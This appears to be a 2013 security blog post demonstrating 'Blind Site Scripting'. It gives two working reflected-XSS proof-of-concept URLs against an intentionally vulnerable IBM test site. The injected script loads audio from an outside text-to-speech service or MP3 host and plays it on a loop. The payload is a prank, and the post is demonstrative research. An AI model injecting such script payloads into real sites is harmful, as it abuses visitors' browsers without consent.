Monday, July 15, 2013

Blind Site Scripting

Alexis and I were having a bright moment after siesta time and decided to put in practice a "brand new" attack... well probably somebody has already done this, but at least we haven't seen it out there before. As usual it had to be something fun and probably silly to keep us motivated.

Ladies and gentlemen, please welcome "Blind Site Scripting" a.k.a. BSS! ... never before XSS would talk to victims!

Here is the PoC, needs Firefox and speakers on (Tested on Firefox 29.0 on May 3rd 2014):

http://testfire.net/search.aspx?txtSearch=<h1>Blind Site Scripting!</h1><script>var audio = new Audio();audio.src ='http://speechutil.com/convert/ogg?text=Hello%20Everybody%21%20this%20is%20a%20blind%20site%20scripting';audio.loop=true;audio.play();</script>

The video showing Blind Site Scripting it in action:

video


 Feel free to edit the text following the "text" parameter above. Of course, you can embed sound files directly like in the example below:

http://testfire.net/search.aspx?txtSearch=<h1>Blind Site Scripting!</h1><script>var audio = new Audio();audio.src ='http://sesaworuban.net/downloads/con_dance_mp3s/06 Macarena.mp3';audio.loop=true;audio.play();</script>

So as you can see using text to speech or recorded files we can play them and use them as a payload in our XSS scenarios thanks to HTML5 features such as the Audio element.


Some additional notes/disclaimers:
  • Of course the you must first find a XSS vulnerable page. Here we are using IBM's Appscan vulnerable site.
  • You would also need a text to speech service, I know at some point speechutil.com will go down and it won't work.
  • Tested on Firefox. IE and Chrome would stop non obfuscated XSS like this. 
  • If It doesn't work I am sure you will make it work eventually... this is not rocket science :)